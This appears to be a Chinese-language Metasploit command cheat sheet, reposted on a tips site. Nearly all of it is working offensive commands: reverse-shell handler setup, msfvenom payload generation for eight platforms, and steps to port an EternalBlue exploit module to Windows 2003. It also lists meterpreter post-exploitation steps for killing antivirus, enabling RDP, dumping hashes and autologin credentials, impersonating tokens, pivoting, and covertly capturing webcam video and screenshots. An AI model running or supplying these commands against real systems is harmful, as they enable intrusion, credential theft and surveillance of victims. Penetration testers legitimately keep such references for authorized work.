1. 程式人生 > 實用技巧 >MSF常用命令備忘錄

MSF常用命令備忘錄

msf下的命令

set session x:設定要攻擊的session

#監聽埠反彈PHP shell
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST
set LPORT
run
#end

#windows/shell_reverse_tcp模組可建立具有meterpreter功能的各版本shellcode,比如Asp、Aspx、msi、vbs、war
#使用windows/shell_reverse_tcp反彈shell
show payloads
use windows/shell_reverse_tcp
set LHOST set LPORT save generate -h #檢視具體命令 generate -t asp #生成asp的shellcode #監聽 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST set LPORT run #將shell上傳後訪問 #end

meterpreter下的命令

ps:獲取目標機正在執行的程序
getpid:檢視meterpreter shell的程序號
migrate 448:把meterpreter shell移動到PID為448的程序中
kill 
984:殺掉PID為984的程序 run post/windows/manage/migrate:自動尋找合適的程序遷移 sysinfo:檢視目標系統資訊 run post/windows/gather/checkvm:檢查目標是否執行在虛擬機器上 idletime:檢視目標機最近的執行時間 route:目標機完整的網路設定 getuid:檢視當前使用者名稱 background:將當前會話放到後臺(適合在多個meterpreter會話的場景下使用) run post/windows/manage/killav:關閉目標機系統防毒軟體 run post/windows/manage/enable_rdp:開啟目標機3389埠 run post
/windows/manage/autoroute:檢視目標機的本地子網情況 background->route add xxx xxx(新增路由)->route print(檢視路由) ↑[路由新增到已攻陷的主機的路由表中,就可以藉助被攻陷的主機對其他網路進行攻擊] run post/windows/gather/enum_logged_on_users:列舉當前有多少使用者登入了目標機 run post/windows/gather/enum_applications:列舉安裝在目標機上的應用程式 run windows/gather/credentials/windows_autologin:抓取自動登入的使用者名稱和密碼 load espia(載入espia外掛)->screengrab(抓取目標機的螢幕截圖) screengrab(也可直接使用screengrab命令抓取目標機的螢幕截圖) webcam_list:檢視目標機是否有攝像頭 webcam_snap:開啟目標機攝像頭拍一張照片 webcam_stream:抓取目標機視訊 shell:進入目標機shell exit:停止meterpreter會話 pwd/getwd:檢視當前處於目標機哪個目錄 getlwd:檢視當前處於本地的那個目錄 ls:列出當前目錄的所有檔案 cd:切換目錄 search -f *.txt -d c:\:搜尋C盤中所有txt檔案(-f指定搜尋檔案模式,-d指定目錄) download c:\test.txt /root:下載目標機c盤的test.txt檔案到本機root下 upload /root/test.txt c:\:上傳本地root下test.txt檔案到目標機c盤下 getsystem:提權 #假冒令牌↓ #有兩種型別令牌: #Delegation Tokens(授權令牌,支援互動式登入,例如遠端桌面登入) #Impersonation Tokens(模擬令牌,非互動式的會話) 在incognito下假冒 use incognito->list_tokens -u:列出可用的token impersonate_token xxxx\\system:假冒xxxx使用者進行攻擊(要用兩個\) #end hashdump:匯出目標機的hash run windows/gather/smart_hashdump:匯出域所有使用者的hash

移植並利用MS17-010(windows 2003)漏洞利用程式碼

#MSF中MS17-010不支援windows 2003
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
將Eternalblue-Doublepulsar-Metasploit資料夾下的eternalblue-doublepulsar.rb複製到/usr/share/metasploit-framework/modules/exploits/windows/smb下
msfconsole->reload_all   #在MSF下重新載入全部檔案
search eternalblue-doublepulsar    #現在就可以搜到該指令碼了

利用msfvenom生成shell的命令

Linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl:
msfvenom -p cmd/unix/reverse
_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl